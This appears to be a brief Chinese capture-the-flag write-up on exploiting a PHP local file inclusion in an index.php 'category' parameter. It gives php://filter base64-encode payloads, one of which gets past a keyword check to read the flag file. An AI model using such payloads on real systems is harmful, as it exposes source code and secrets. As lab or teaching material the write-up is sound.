先查看了源码
又抓包查看信息
没发现有用信息
看到url为index.php?category=woofers
首先就怀疑是文件包含漏洞
伪协议包含
?category=php://filter/convert.base64-encode/resource=index
了解到必须要含有woofer,smeowers,index其中之一就可以直接用伪协议做了
?category=php://filter/convert.base64-encode/smeowers/resource=flag
把这三个其中一个加进去就可以